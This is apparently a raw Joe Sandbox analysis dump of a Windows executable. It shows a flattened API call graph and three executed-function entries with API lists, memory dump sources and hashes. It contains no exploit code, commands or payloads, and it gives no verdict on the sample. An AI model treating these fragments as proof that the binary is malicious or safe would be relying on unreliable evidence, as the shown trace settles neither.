f8fbd0 2 API calls 65303->65304 65305 f1ddd9 65304->65305 65306 f8fbd0 2 API calls 65305->65306 65307 f1dde9 65306->65307 65308 f8fbd0 2 API calls 65307->65308 65309 f1ddfb 65308->65309 65310 f8fbd0 2 API calls 65309->65310 65311 f1de0a 65310->65311 65312 f8fbd0 2 API calls 65311->65312 65313 f1de15 65312->65313 65313->65275 65315 f1e363 65314->65315 65316 f1e3a8 WideCharToMultiByte 65315->65316 65317 f1e3c4 65315->65317 65316->65317 65317->65277 65320 e964f5 65318->65320 65319 e9651c CreateDialogIndirectParamA 65339 e9655d 65319->65339 65320->65319 65322 e8827b 13 API calls 65320->65322 65324 e96518 65322->65324 65323 e96546 65323->65287 65324->65319 65324->65323 65325->65279 65326->65283 65327->65285 65329 e9d4e7 65328->65329 65330 f8fbe7 GetClassInfoA 65329->65330 65331 f8fbfc 65330->65331 65334 e9eb88 65331->65334 65333 f1dd8e 65333->65294 65338 fcbab5 65334->65338 65336 e9eb94 GetClassInfoA 65337 e9ebab Concurrency::details::ExternalContextBase::~ExternalContextBase 65336->65337 65337->65333 65338->65336 65340 e96566 65339->65340 65341 e9659b 65340->65341 65342 e9657a GetLastError 65340->65342 65343 e96584 65340->65343 65341->65323 65342->65343 65347 e8813f DeactivateActCtx DeactivateActCtx GetProcAddress 65343->65347 65345 e96590 65345->65341 65346 e96594 SetLastError 65345->65346 65346->65341 65347->65345 65348 e958b7 65349 e958c4 65348->65349 65354 e958f4 65348->65354 65350 ea0254 RaiseException 65349->65350 65351 e958cc 65350->65351 65356 ea64af 65351->65356 65357 ea64b8 65356->65357 65358 e958d7 65356->65358 65381 ea651f RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65357->65381 65358->65354 65360 e8326c 65358->65360 65361 e83271 65360->65361 65362 e8327b 65361->65362 65363 e83330 65361->65363 65382 e86200 65362->65382 65365 e833dd 65363->65365 65375 e83378 _memcpy_s 65363->65375 65367 e9fe2b 3 API calls 65365->65367 65366 e83297 65368 e832a0 AppendMenuA AppendMenuA 65366->65368 65369 e832c1 SendMessageA SendMessageA 65366->65369 65370 e833db 65367->65370 65368->65369 65373 e8330f 65369->65373 65372 fcb27c ___crtLCMapStringA 5 API calls 65370->65372 65374 e833f7 65372->65374 65376 fcb27c ___crtLCMapStringA 5 API calls 65373->65376 65374->65354 65378 e823e0 7 API calls 65375->65378 65377 e8332c 65376->65377 65377->65354 65379 e833d0 65378->65379 65395 e9581b DestroyWindow RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65379->65395 65381->65358 65383 e86212 65382->65383 65384 e86218 65383->65384 65385 e86220 FindResourceW 65383->65385 65384->65366 65386 e8623f LoadResource 65385->65386 65387 e86307 65385->65387 65386->65387 65388 e8624f LockResource 65386->65388 65387->65366 65388->65387 65389 e86260 SizeofResource 65388->65389 65390 e86272 65389->65390 65390->65387 65391 e86294 WideCharToMultiByte 65390->65391 65392 e862b1 65391->65392 65393 e862f0 65391->65393 65394 e862d1 WideCharToMultiByte 65392->65394 65393->65366 65394->65393 65395->65370 65396 e875b6 65397 e875c2 __EH_prolog3 65396->65397 65404 e87675 GetModuleFileNameA 65397->65404 65398 e875ec 65401 e87661 Concurrency::details::ExternalContextBase::~ExternalContextBase 65398->65401 65410 e85f80 65398->65410 65400 e87632 65414 e87949 65400->65414 65405 e876a3 65404->65405 65408 e876d5 65404->65408 65406 e876a7 PathFindExtensionA 65405->65406 65405->65408 65406->65408 65407 fcb27c ___crtLCMapStringA 5 API calls 65409 e876e5 65407->65409 65408->65407 65409->65398 65411 e85faf 65410->65411 65412 e86200 6 API calls 65411->65412 65413 e85fe0 65411->65413 65412->65413 65413->65400 65416 e8795d __EH_prolog3_GS 65414->65416 65415 e8797e 65415->65401 65416->65415 65417 e879e3 CoCreateGuid 65416->65417 65418 e87a4e _strlen 65416->65418 65419 e879fe 65417->65419 65444 e8702d 65418->65444 65479 e82320 13 API calls 2 library calls 65419->65479 65422 e87a81 _strlen 65423 e8702d 19 API calls 65422->65423 65424 e87a97 65423->65424 65425 e8702d 19 API calls 65424->65425 65426 e87aa6 65425->65426 65454 e8734a 65426->65454 65428 e87ab4 _strlen 65429 e8702d 19 API calls 65428->65429 65431 e87adb 65428->65431 65430 e87acf 65429->65430 65432 e8702d 19 API calls 65430->65432 65433 e87b1a 65431->65433 65434 e87b9b 65431->65434 65432->65431 65435 e8691b 19 API calls 65433->65435 65458 e8691b 65434->65458 65439 e87b22 SysFreeString 65435->65439 65437 e87ba3 65472 e87c14 65437->65472 65440 e87bfa 65439->65440 65441 fcba28 std::_Locinfo::_Locinfo_dtor 5 API calls 65440->65441 65442 e87c11 65441->65442 65442->65401 65445 e870ad 65444->65445 65447 e87050 65444->65447 65481 ea73ff GetModuleHandleW GetProcAddress EncodePointer DecodePointer 65445->65481 65447->65445 65449 e87076 65447->65449 65448 e870cc 65453 e8710f 65448->65453 65482 ea73aa GetModuleHandleW GetProcAddress EncodePointer DecodePointer 65448->65482 65480 e885b5 11 API calls _memcpy_s 65449->65480 65451 e87098 65451->65422 65453->65422 65455 e8736f 65454->65455 65456 e87356 65454->65456 65455->65428 65456->65455 65483 fd5c8f 11 API calls 65456->65483 65459 e86939 65458->65459 65460 e86927 65458->65460 65459->65437 65484 e86e0e 65460->65484 65462 e86931 __EH_prolog3_GS 65462->65459 65467 e8698a 65462->65467 65492 fd5a87 65462->65492 65464 e86aab 65465 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65464->65465 65466 e86ab0 65465->65466 65467->65464 65468 e869b7 GetCurrentThread GetCurrentThreadId GetVersionExA 65467->65468 65469 e86a6e 65468->65469 65470 fcba28 std::_Locinfo::_Locinfo_dtor 5 API calls 65469->65470 65471 e86aa8 65470->65471 65471->65437 65502 ea7b94 65472->65502 65475 e87c45 65475->65439 65476 e87c2d 65509 ea7b2f GetModuleHandleW GetProcAddress EncodePointer DecodePointer 65476->65509 65478 e87c3e 65478->65475 65479->65418 65480->65451 65481->65448 65482->65453 65483->65455 65485 e86e19 65484->65485 65486 e86e6d 65484->65486 65485->65486 65487 e86e20 MultiByteToWideChar 65485->65487 65486->65462 65488 e86e3d 65487->65488 65489 e86e40 SysAllocStringLen 65487->65489 65488->65489 65489->65486 65490 e86e4e MultiByteToWideChar 65489->65490 65490->65486 65491 e86e64 SysFreeString 65490->65491 65491->65486 65493 fd5a94 65492->65493 65497 fd5ac4 65492->65497 65493->65497 65500 fd6d99 11 API calls _memcpy_s 65493->65500 65495 fd5abd 65496 fd5ace 65495->65496 65495->65497 65501 fd3ec8 11 API calls __Getctype 65496->65501 65497->65467 65499 fd5ada 65500->65495 65501->65499 65503 ea7bcc DecodePointer 65502->65503 65504 ea7ba1 GetModuleHandleW 65502->65504 65507 ea7bd5 65503->65507 65505 e87c22 65504->65505 65506 ea7bb0 GetProcAddress EncodePointer 65504->65506 65505->65475 65505->65476 65506->65507 65507->65505 65508 ea7be7 RegisterApplicationRestart 65507->65508 65508->65505 65509->65478 65510 e95e37 65511 e95e41 65510->65511 65512 e95e50 GetDesktopWindow 65511->65512 65514 e95eb2 65511->65514 65513 e95e5a IsWindowEnabled 65512->65513 65512->65514 65513->65514 65515 e95e65 EnableWindow 65513->65515 65517 ea022a 2 API calls 65514->65517 65516 e867a6 RaiseException 65515->65516 65526 e95e79 65516->65526 65518 e95ecc 65517->65518 65540 e95d59 65518->65540 65520 e95f05 65521 e95f44 65520->65521 65549 ea50bb EnableWindow 65520->65549 65524 e95f48 EnableWindow 65521->65524 65525 e95f51 65521->65525 65522 e95eda 65522->65520 65530 ea022a 2 API calls 65522->65530 65524->65525 65527 e95f55 GetActiveWindow 65525->65527 65528 e95f67 65525->65528 65526->65514 65529 ea579d IsWindowEnabled 65526->65529 65527->65528 65531 e95f60 SetActiveWindow 65527->65531 65550 e963a8 IsWindow EnableWindow RaiseException 65528->65550 65533 e95ea5 65529->65533 65532 e95ef7 65530->65532 65531->65528 65534 e95d59 15 API calls 65532->65534 65533->65514 65548 ea50bb EnableWindow 65533->65548 65534->65520 65537 e95f7f 65538 e95f88 FreeResource 65537->65538 65539 e95f91 Concurrency::details::ExternalContextBase::~ExternalContextBase 65537->65539 65538->65539 65542 e95d6e 65540->65542 65541 e95dae 65541->65522 65542->65541 65543 e95d96 65542->65543 65544 ea562b GetWindowLongA 65542->65544 65543->65541 65546 ea5bad SetWindowPos 65543->65546 65545 e95d81 65544->65545 65551 ea2b54 65545->65551 65546->65541 65548->65514 65549->65521 65550->65537 65552 ea2b70 65551->65552 65556 ea2b75 GetParent 65551->65556 65553 ea562b GetWindowLongA 65552->65553 65553->65556 65572 e9be4c 65556->65572 65557 ea2b9c PeekMessageA 65570 ea2b93 65557->65570 65559 ea2bb3 65559->65570 65586 ea5c5c ShowWindow 65559->65586 65587 ea5c5c ShowWindow 65559->65587 65560 ea2cb2 65589 e86fda PostQuitMessage RaiseException 65560->65589 65562 ea2bbc UpdateWindow 65562->65570 65564 ea2bee SendMessageA 65564->65559 65564->65570 65565 ea2ca9 65565->65543 65566 ea2bd8 SendMessageA 65566->65570 65568 ea2c47 UpdateWindow 65568->65570 65570->65557 65570->65559 65570->65560 65570->65564 65570->65565 65570->65566 65571 ea2c88 PeekMessageA 65570->65571 65575 e9c071 65570->65575 65588 e9bfdc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65570->65588 65571->65570 65573 e9d53b RaiseException 65572->65573 65574 e9be51 65573->65574 65574->65570 65576 e9d51a Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65575->65576 65577 e9bf98 65576->65577 65578 e9c07e 65577->65578 65579 e9d53b RaiseException 65577->65579 65578->65570 65580 e9bf9f KiUserCallbackDispatcher 65579->65580 65581 e9bfd6 65580->65581 65582 e9bfb4 65580->65582 65581->65570 65582->65581 65590 e9c00c 65582->65590 65585 e9bfc8 TranslateMessage DispatchMessageA 65585->65581 65586->65562 65587->65568 65588->65570 65591 e9d51a Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65590->65591 65592 e9bfc3 65591->65592 65592->65581 65592->65585 65593 e9d4f6 65594 e9d4fa 65593->65594 65595 e9d510 65593->65595 65594->65595 65597 ea6a01 7 API calls 3 library calls 65594->65597 65597->65595 65598 ea378f 65599 ea37cb GetClassLongA 65598->65599 65600 ea379d GetClassNameA 65598->65600 65603 ea37c5 65599->65603 65601 ea37e0 GetWindowLongA 65600->65601 65602 ea37b4 65600->65602 65605 ea3835 CallNextHookEx 65601->65605 65606 ea37ef GetPropA 65601->65606 65613 fd6b6e 11 API calls 65602->65613 65603->65601 65603->65605 65608 ea385f 65605->65608 65609 ea3852 UnhookWindowsHookEx 65605->65609 65606->65605 65607 ea37ff SetPropA GetPropA 65606->65607 65607->65605 65610 ea381c GlobalAddAtomA SetWindowLongA 65607->65610 65611 fcba28 std::_Locinfo::_Locinfo_dtor 5 API calls 65608->65611 65609->65608 65610->65605 65612 ea3866 65611->65612 65613->65603 65614 ff1b5a CreateFileW 65615 e8750f 65616 e867a6 RaiseException 65615->65616 65617 e8751b 65616->65617 65618 e87521 PostMessageA 65617->65618 65619 e87556 65617->65619 65621 e8754c 65618->65621 65620 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65619->65620 65622 e8755b 65620->65622 65625 e87753 65622->65625 65628 e87fcf 65625->65628 65626 e875af 65627 e88006 RegOpenKeyExA 65627->65628 65628->65626 65628->65627 65629 e88023 RegQueryValueExA 65628->65629 65630 e88076 RegCloseKey 65628->65630 65629->65628 65630->65628 65631 e9eac0 65632 e9eac8 65631->65632 65633 e9eaeb 65631->65633 65632->65633 65634 e9eace GetCurrentThreadId SetWindowsHookExA 65632->65634 65634->65633 65635 e9eaf9 65634->65635 65644 e990f4 RaiseException __CxxThrowException@8 65635->65644 65645 ea3483 65674 fcbaec 65645->65674 65647 ea348f GetPropA 65648 ea34bb 65647->65648 65649 ea356c 65647->65649 65650 ea354b 65648->65650 65651 ea34c4 65648->65651 65652 ea022a 2 API calls 65649->65652 65656 ea022a 2 API calls 65650->65656 65653 ea34c9 65651->65653 65654 ea3521 SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 65651->65654 65655 ea3572 65652->65655 65658 ea3591 CallWindowProcA 65653->65658 65659 ea34d5 65653->65659 65661 ea358a 65654->65661 65660 ea022a 2 API calls 65655->65660 65657 ea3551 65656->65657 65676 ea395a 10 API calls 65657->65676 65673 ea351c 65658->65673 65663 ea022a 2 API calls 65659->65663 65664 ea357b 65660->65664 65661->65658 65661->65673 65665 ea34e7 65663->65665 65677 ea38e5 9 API calls 65664->65677 65675 ea3ae7 GetWindowRect GetWindowLongA 65665->65675 65669 ea3561 65669->65661 65671 ea34f8 CallWindowProcA 65672 ea3a3c 32 API calls 65671->65672 65672->65673 65678 fcba39 5 API calls ___crtLCMapStringA 65673->65678 65674->65647 65675->65671 65676->65669 65677->65669 65679 e81d01 65696 e89764 65679->65696 65685 e81d38 _memcpy_s 65686 e81d78 LoadIconW 65685->65686 65687 e81da1 65686->65687 65727 e96dd1 11 API calls 65687->65727 65697 e89792 65696->65697 65698 e89776 SHGetMalloc 65696->65698 65700 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65697->65700 65698->65697 65699 e81d15 65698->65699 65702 e91ef1 65699->65702 65701 e89797 65700->65701 65703 e91efc 65702->65703 65705 e81d2c 65703->65705 65728 e8ac8a 65703->65728 65718 e9559f 65705->65718 65707 e97ea2 55 API calls 65708 e91f43 65707->65708 65732 ed9c9f 263 API calls 2 library calls 65708->65732 65710 e91f51 65733 e8a1a3 SendMessageA RaiseException 65710->65733 65712 e91f56 65734 e8a1da RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65712->65734 65714 e91f5b 65735 e91c7a 5 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 65714->65735 65716 e91f60 65716->65705 65736 eeb997 IsWindow SendMessageA 65716->65736 65737 fd3fc4 65718->65737 65721 fd5a87 11 API calls 65722 e955b5 65721->65722 65723 fd3fc4 __freea 2 API calls 65722->65723 65724 e955c0 65723->65724 65725 fd5a87 11 API calls 65724->65725 65726 e955c8 65725->65726 65726->65685 65729 e8ac99 65728->65729 65731 e8aca0 65728->65731 65730 e973fe 106 API calls 65729->65730 65730->65731 65731->65707 65732->65710 65733->65712 65734->65714 65735->65716 65736->65705 65740 fe26c8 65737->65740 65739 e955ad 65739->65721 65741 fe26d3 RtlFreeHeap 65740->65741 65742 fe26fc _free 65740->65742 65741->65742 65743 fe26e8 65741->65743 65742->65739 65744 fe26ee GetLastError 65743->65744 65744->65742 65745 e96403 65750 e984fc 65745->65750 65749 e96423 65770 e98499 65750->65770 65753 e9850c 65754 e9851b 65753->65754 65755 e98541 GetWindowLongA 65753->65755 65756 e9d53b RaiseException 65754->65756 65757 e98551 GetParent 65755->65757 65767 e98538 65755->65767 65760 e98520 65756->65760 65768 e9852a 65757->65768 65758 e98573 65761 e98584 65758->65761 65762 e9857b GetLastActivePopup 65758->65762 65759 e98566 GetParent 65759->65758 65759->65759 65764 e867a6 RaiseException 65760->65764 65760->65768 65763 e985ab 65761->65763 65765 e9858f IsWindowEnabled 65761->65765 65762->65761 65763->65749 65764->65768 65765->65763 65766 e9859a 65765->65766 65766->65763 65769 e9859e EnableWindow 65766->65769 65767->65758 65767->65759 65768->65755 65768->65767 65769->65763 65771 e867a6 RaiseException 65770->65771 65772 e96409 65771->65772 65772->65753 65773 e86903 65774 e86911 Concurrency::details::ExternalContextBase::~ExternalContextBase 65773->65774 65775 e86907 65773->65775 65777 e86d8b 65775->65777 65778 e86d98 65777->65778 65780 e86da0 65777->65780 65784 e8740f MultiByteToWideChar 65778->65784 65783 e86dcc 65780->65783 65785 e8786d 40 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 65780->65785 65782 e86db3 MultiByteToWideChar 65782->65783 65783->65774 65784->65780 65785->65782 65786 e83f44 65787 e83f55 65786->65787 65804 e852a0 65787->65804 65789 e83fca 65790 e83fe7 65789->65790 65791 e8404d 65789->65791 65792 e852a0 11 API calls 65790->65792 65800 e84010 65791->65800 65811 e82b50 SwitchToThread SetLastError 65791->65811 65794 e83ff1 65792->65794 65810 e858b0 21 API calls 4 library calls 65794->65810 65795 e84097 65812 e82f20 14 API calls 2 library calls 65795->65812 65797 e840a1 65799 fced47 __CxxThrowException@8 RaiseException 65797->65799 65801 e840af 65799->65801 65813 e858b0 21 API calls 4 library calls 65801->65813 65803 e840be 65805 e85320 65804->65805 65806 e85347 65804->65806 65814 fd55ab 11 API calls _memcpy_s 65805->65814 65808 fcb27c ___crtLCMapStringA 5 API calls 65806->65808 65809 e8538b 65808->65809 65809->65789 65810->65800 65811->65795 65812->65797 65813->65803 65814->65806 65815 ea6a47 65816 f3d600 ~refcount_ptr 2 API calls 65815->65816 65817 ea6a4e 65816->65817 65818 fced47 __CxxThrowException@8 RaiseException 65817->65818 65823 ea6a57 __EH_prolog3 65818->65823 65819 ea6add 65821 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65819->65821 65820 ea6aa5 65847 ea6b16 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 65820->65847 65825 ea6ae2 65821->65825 65823->65819 65823->65820 65824 ea6a8b 65823->65824 65846 ea6578 TlsAlloc InitializeCriticalSection RaiseException 65823->65846 65824->65819 65830 ea6748 EnterCriticalSection 65824->65830 65828 ea6a9f 65828->65819 65828->65820 65829 ea6ab1 Concurrency::details::ExternalContextBase::~ExternalContextBase 65835 ea6770 65830->65835 65831 ea6812 _memcpy_s 65832 ea682d LeaveCriticalSection 65831->65832 65832->65828 65833 ea67ab 65837 ea67b3 GlobalAlloc 65833->65837 65834 ea67c0 GlobalHandle GlobalUnlock 65836 e9943a 65834->65836 65835->65831 65835->65833 65835->65834 65838 ea67e1 GlobalReAlloc 65836->65838 65839 ea67eb 65837->65839 65838->65839 65840 ea67ef GlobalLock 65839->65840 65841 ea6847 65839->65841 65840->65831 65842 ea685b LeaveCriticalSection 65841->65842 65843 ea684c GlobalHandle GlobalLock 65841->65843 65848 e990f4 RaiseException __CxxThrowException@8 65842->65848 65843->65842 65846->65824 65847->65829 65849 e83886 65850 e86200 6 API calls 65849->65850 65852 e83895 65850->65852 65876 e855d0 65852->65876 65853 e83a38 65858 e86200 6 API calls 65853->65858 65862 e83a92 65853->65862 65863 e83de2 65853->65863 65875 e83d03 65853->65875 65854 e83d65 _AnonymousOriginator 65855 fcb27c ___crtLCMapStringA 5 API calls 65854->65855 65856 e83dc0 65855->65856 65858->65862 65862->65863 65864 e86200 6 API calls 65862->65864 65865 e83ae1 65862->65865 65884 fd3eab 11 API calls 2 library calls 65863->65884 65864->65865 65865->65863 65866 e86200 6 API calls 65865->65866 65867 e83b41 65865->65867 65866->65867 65867->65863 65868 e86200 6 API calls 65867->65868 65869 e83b90 65867->65869 65868->65869 65869->65863 65870 e86200 6 API calls 65869->65870 65871 e83c57 65869->65871 65870->65871 65871->65863 65872 e86200 6 API calls 65871->65872 65873 e83cb7 65871->65873 65872->65873 65873->65863 65874 e86200 6 API calls 65873->65874 65873->65875 65874->65875 65875->65854 65875->65863 65879 e855ee _memmove_s 65876->65879 65881 e85614 _memcpy_s 65876->65881 65877 e856fe 65886 e85cd0 14 API calls std::_Xinvalid_argument 65877->65886 65879->65853 65880 e85703 65881->65877 65883 e856e0 _AnonymousOriginator 65881->65883 65885 fd3eab 11 API calls 2 library calls 65881->65885 65883->65853 65886->65880 65887 e87e87 65888 e87e91 65887->65888 65889 e881ce 16 API calls 65888->65889 65894 e87ed9 65888->65894 65891 e87ec6 65889->65891 65890 fcb27c ___crtLCMapStringA 5 API calls 65892 e87ee9 65890->65892 65893 e881ce 16 API calls 65891->65893 65891->65894 65893->65894 65894->65890 65895 e8125e 65900 f53d21 65895->65900 65899 e8126d 65904 f5254a 65900->65904 65902 e81263 65903 fcb512 16 API calls __onexit 65902->65903 65903->65899 65905 f52556 __EH_prolog3 65904->65905 65906 f3d58c 6 API calls 65905->65906 65907 f5258e 65906->65907 65908 f52597 GetProfileIntA GetProfileIntA 65907->65908 65909 f525cf 65907->65909 65908->65909 65910 f3d600 ~refcount_ptr 2 API calls 65909->65910 65911 f525d6 Concurrency::details::ExternalContextBase::~ExternalContextBase 65910->65911 65911->65902 65912 fd4945 65913 fd495d 65912->65913 65915 fd497b 65912->65915 65913->65915 65916 fde96b 65913->65916 65917 fde98c 65916->65917 65918 fde977 65916->65918 65917->65915 65921 fd3e9b 11 API calls _memcpy_s 65918->65921 65920 fde987 65920->65915 65921->65920

                                                                              Executed Functions

                                                                              Function 00EA7900 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 409 ea7900-ea790b 410 ea7938-ea793f DecodePointer 409->410 411 ea790d-ea791a GetModuleHandleW 409->411 414 ea7941-ea7943 410->414 412 ea791c-ea7936 GetProcAddress EncodePointer 411->412 413 ea795d-ea7970 call ea7d42 GetLocaleInfoW 411->413 412->414 419 ea7976-ea7978 413->419 414->413 415 ea7945-ea795b GetLocaleInfoEx 414->415 415->419
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00E87E4E,?,00000003,?,00000004,00000000), ref: 00EA7912
                                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00EA7922
                                                                              • EncodePointer.KERNEL32(00000000,?,00E87E4E,?,00000003,?,00000004,00000000), ref: 00EA792B
                                                                              • DecodePointer.KERNEL32(9FF94F6C,?,?,00E87E4E,?,00000003,?,00000004,00000000), ref: 00EA7939
                                                                              • GetLocaleInfoEx.KERNEL32(?,00E87E4E,?,00000003,?,00000004,00000000), ref: 00EA7959
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000004,?,00000003,?,00E87E4E,?,00000003,?,00000004,00000000), ref: 00EA7970
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocalePointer$AddressDecodeEncodeHandleModuleProc
                                                                              • String ID: GetLocaleInfoEx$kernel32.dll
                                                                              • API String ID: 3226634038-1547310189
                                                                              • Opcode ID: 16ffd0335a4e26064e1411987ecfc7db5b2a80ff9a05c66f71534cb2d71b96d6
                                                                              • Instruction ID: 2c2e3754297fe7bbab3b5bd2f8add2c24405af24b333b8ae7bc09d77cbd50b10
                                                                              • Opcode Fuzzy Hash: 16ffd0335a4e26064e1411987ecfc7db5b2a80ff9a05c66f71534cb2d71b96d6
                                                                              • Instruction Fuzzy Hash: DE014F35504219BFCF235F64DC488AA3F69FB4E750B019015FD85AD214DB36D8509BA0
                                                                              Function 00E835BB Relevance: 10.6, APIs: 7, Instructions: 112networkfilewindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 745 e835bb-e835c3 746 e83619-e8362b InternetCloseHandle * 2 745->746 747 e835c5-e835d2 call e86788 745->747 749 e8362d-e8367a call fd445f call fd46bf call fd49fb call fd4ac9 call e86783 746->749 750 e83686-e8368e PostMessageA 746->750 747->746 754 e835d4-e835df GetTickCount 747->754 780 e8367f-e83684 749->780 753 e83694-e836ab 750->753 756 e836ad-e836b0 753->756 757 e836b5-e836ca 753->757 761 e835e1-e835f9 InternetReadFile 754->761 756->757 759 e836cc-e836cf 757->759 760 e836d4-e836ef call fcb27c 757->760 759->760 764 e83668-e83675 call e86783 761->764 765 e835fb-e83606 GetTickCount 761->765 775 e83616 764->775 769 e83608-e8360a GetTickCount 765->769 770 e8360d-e83611 765->770 769->770 770->761 773 e83613 770->773 773->775 775->746 780->750 780->753
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00E835DA
                                                                              • InternetReadFile.WININET(?,?,00000800,?), ref: 00E835F1
                                                                              • GetTickCount.KERNEL32 ref: 00E835FE
                                                                              • GetTickCount.KERNEL32 ref: 00E83608
                                                                              • InternetCloseHandle.WININET ref: 00E8361A
                                                                              • InternetCloseHandle.WININET(?), ref: 00E83623
                                                                              • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00E8368E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CountInternetTick$CloseHandle$FileMessagePostRead
                                                                              • String ID:
                                                                              • API String ID: 2556584633-0
                                                                              • Opcode ID: 33f5585c60ece2241b8208bf014ce61f6fd37b404e816010f79c727bceecf01c
                                                                              • Instruction ID: c6c77e033438353dd1d41d5cd0636eb0b8adf77fc636d44b74b48d7efe2469f8
                                                                              • Opcode Fuzzy Hash: 33f5585c60ece2241b8208bf014ce61f6fd37b404e816010f79c727bceecf01c
                                                                              • Instruction Fuzzy Hash: 0341B671901208ABDB11EFB8CC45BDDB7B5BF48B14F144265E81DBB391E7369E009BA4
                                                                              Function 00E83400 Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00E8341C
                                                                                • Part of subcall function 00E998B2: __EH_prolog3.LIBCMT ref: 00E998B9
                                                                                • Part of subcall function 00E998B2: BeginPaint.USER32(?,?,00000004,00E96319,?,00000058,00E834D2), ref: 00E998E5
                                                                              • SendMessageA.USER32(?,00000027,?,00000000), ref: 00E83450
                                                                              • GetSystemMetrics.USER32(0000000B), ref: 00E8345E
                                                                              • GetSystemMetrics.USER32(0000000C), ref: 00E83464
                                                                              • GetClientRect.USER32(?,?), ref: 00E83478
                                                                              • DrawIcon.USER32(?,?,?,?), ref: 00E834AA
                                                                                • Part of subcall function 00E99A3C: EndPaint.USER32(?,?,8C3A2C7B,?,00000000,00FF4C50,000000FF,?,00E9633B,?,?,00000058,00E834D2), ref: 00E99A6E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsPaintSystem$BeginClientDrawH_prolog3IconIconicMessageRectSend
                                                                              • String ID:
                                                                              • API String ID: 2989630354-0
                                                                              • Opcode ID: c28cea4c671ceb2325e84de4b14c4f00f2138314885343e4c910d95e1438b48b
                                                                              • Instruction ID: db9c2390f9cfcec4cd8364dc24299e7e3e1d5342a2b0470509b596c3b72ea945
                                                                              • Opcode Fuzzy Hash: c28cea4c671ceb2325e84de4b14c4f00f2138314885343e4c910d95e1438b48b
                                                                              • Instruction Fuzzy Hash: 0B21B5726042059FCB11DF78DC4AA6E77E9FB88310F04062DF989D6191DB65E9048B42
